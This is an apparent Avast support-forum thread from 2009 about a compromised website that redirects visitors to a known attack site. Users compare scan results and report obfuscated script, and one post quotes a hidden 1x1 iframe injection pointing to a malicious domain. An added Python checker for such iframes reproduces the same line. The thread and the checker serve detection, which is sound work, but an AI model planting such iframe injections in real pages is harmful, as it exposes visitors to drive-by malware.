Author Topic: Website billmoore.com Compromised  (Read 3633 times)


strifekensei

  • Guest
Website billmoore.com Compromised
« on: April 30, 2009, 10:08:09 PM »
While visiting hXXp://billmoore.com/ Avast threw the warning, "Sign of "JS:Agent-AV [trj]" has been found in "hXXp://searchdonor.com/" file."

-SK
« Last Edit: April 30, 2009, 10:37:13 PM by kubecj »

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Website billmoore.com Compromised
« Reply #1 on: April 30, 2009, 10:16:49 PM »
First of all, please change the http:// to hXXp to prevent clicking to the dangerous website.

Did you try sending the webmaster the problem?
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: Website billmoore.com Compromised
« Reply #2 on: May 01, 2009, 12:05:36 AM »
> While visiting hXXp://billmoore.com/ Avast threw the warning, "Sign of "JS:Agent-AV [trj]" has been found in "hXXp://searchdonor.com/" file."
>
> -SK

What is the full URL of the link you clicked to be directed to the searchdonor.com site infection, as I didn't find anything on the home page?
So I couldn't see what it was that would direct you to the searchdonor.com site.

Check the avast! Log Viewer (right click the avast 'a' icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe - Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log
####
When posting URLs to suspect sites, change the http to hXXp so the link isn't active (clickable) avoiding accidental exposure.

I did visit the searchdonor.com site, and not only did avast alert but so did Firefox's safe browsing function (see image1); it has been reported as an attack site.

Checking the searchdonor.com placeholder page, it has been hacked: obfuscated script after the closing html tag, see image2. See image3 for what the previous code tries to do: send you to yet another site.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline !Donovan

Re: Website billmoore.com Compromised
« Reply #3 on: May 01, 2009, 01:09:15 AM »
Visited hXXp://searchdonor.com/ with McAfee SiteAdvisor, Web Of Trust, Avast! Home Edition, Firefox, and NoScript, and Avast found this.

Code:
4/30/2009   7:59:36 PM   1241135976   SYSTEM   996   Sign of "JS:Agent-AV [trj]" has been found in "hXXp://searchdonor.com/" file.

Wasn't this site hacked?

Offline DavidR

Re: Website billmoore.com Compromised
« Reply #4 on: May 01, 2009, 01:22:11 AM »
The searchdonor.com site is a known attack site; it may have been hacked also, but that doesn't answer how strifekensei ended up there whilst visiting billmoore.com, as that would imply it too had been hacked to send him to searchdonor.com.

CharleyO

  • Guest
Re: Website billmoore.com Compromised
« Reply #5 on: May 01, 2009, 04:27:59 AM »
***

The billmoore.com site has at least one hidden iframe infection as shown below :

<iframe src="kakashka.us" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

The site in the iframe is not a good site to visit.


***
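
A static check for the two markers reported in this thread, the 1x1 hidden iframe quoted above and markup placed after the closing html tag, written as an added example that is not part of any forum post. The sample page is constructed, and the names `IframeAudit` and `audit` are hypothetical.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: the hidden iframe quoted in the post above, one
# ordinary visible iframe, and a placeholder script appended after </html>.
SAMPLE = '''<html><body><h1>Intro</h1>
<iframe src="kakashka.us" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="/map.html" width="600" height="400"></iframe>
</body></html><script>/* constructed placeholder */</script>'''

HIDING_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def _tiny(value):
    """True for a pixel size of 0 or 1 (e.g. '1', '1px', '0')."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 1

class IframeAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # (line, reason, detail)
        self.html_closed = False  # set once </html> has been seen

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        line = self.getpos()[0]
        if self.html_closed:
            # Nothing legitimate should follow the closing html tag.
            self.findings.append((line, "markup after </html>", tag))
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("tiny size")
            if HIDING_CSS.search(a.get("style") or ""):
                reasons.append("hidden by CSS")
            if reasons:
                self.findings.append(
                    (line, "hidden iframe: " + ", ".join(reasons), a.get("src")))

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

def audit(html):
    """Return a list of (line, reason, detail) findings for one HTML document."""
    parser = IframeAudit()
    parser.feed(html)
    parser.close()
    return parser.findings
```

This only inspects the HTML as served; a frame written into the page by script at load time will not show up here and needs a check of the rendered DOM.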

Offline DavidR

Re: Website billmoore.com Compromised
« Reply #6 on: May 01, 2009, 04:18:51 PM »
I have also seen the one that appears to have the link to searchdonor.com, I have noscript block iframes and it also places a marker where the iframe would go, see image. So it is in the intro page with the animation, before you actually enter the site.

However, it doesn't appear in the source of the page so there must be something else going on, like SQL injection or some exploit of some other content management software PHP, etc.

So the other hidden iframe pointing at kakashka.us is also another issue (but not one avast is alerting on).